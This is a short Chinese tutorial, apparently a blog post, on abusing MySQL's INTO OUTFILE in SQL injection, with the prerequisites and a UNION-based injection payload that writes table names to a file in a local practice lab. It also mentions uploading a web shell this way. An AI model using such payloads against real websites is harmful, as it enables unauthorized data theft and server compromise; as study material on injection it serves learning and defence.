WEB安全--SQL注入--INTO OUTFILE

一、INTO OUTFILE 函数语法:

sql 复制代码
SELECT column1, column2,
INTO OUTFILE 'file_path'
FROM your_table
WHERE your_conditions;

使用此方式在SQL注入的过程中可以:

1、上传shell得到数据库的后端的操作权限

2、爆出数据库的信息

二、使用该函数的条件:

1、mysql操作者需要root权限
2、mysql的my.ini文件中的secure_file_priv参数值需要为空(默认为NULL,注意NULL不是空)
3、需要知道网站的物理路径

三、参考例子:

sql 复制代码
?id=-1')) union select 1,2,'group_concat(table_name)' 
into outfile 'D:/桌面desktop/abcd.txt' 
from information_schema.tables 
where table_schema='security'--+

这里是通过into outfile函数将表名导出到我的桌面,毕竟是模拟,所以服务器就是我的电脑所以也就相当于网站的物理路径了

相关推荐
乐迪信息17 分钟前
乐迪信息:AI摄像机在智慧煤矿人员安全与行为识别中的技术应用
大数据·人工智能·算法·安全·视觉检测
XINERTEL18 分钟前
看不见的安全防线:信而泰仪表如何验证零信任有效性
安全
qq_3129201119 分钟前
Nginx限流与防爬虫与安全配置方案
运维·爬虫·nginx·安全
float_六七22 分钟前
预编译SQL:安全与性能的双重保障
sql·安全·oracle
灵犀物润23 分钟前
Kubernetes 配置检查与发布安全清单
安全·容器·kubernetes
GanGuaGua26 分钟前
Linux系统:线程的互斥和安全
linux·运维·服务器·c语言·c++·安全
Hello.Reader41 分钟前
Kafka在多环境中安全管理敏感
分布式·安全·kafka
深盾安全2 小时前
鸿蒙HAP包解包、打包、签名与加固全攻略
安全
wanhengidc2 小时前
云手机就是虚拟机吗?
运维·网络·安全·智能手机
W-GEO3 小时前
前端安全攻防:XSS, CSRF 等常见威胁的防范与检测指南
前端·安全·xss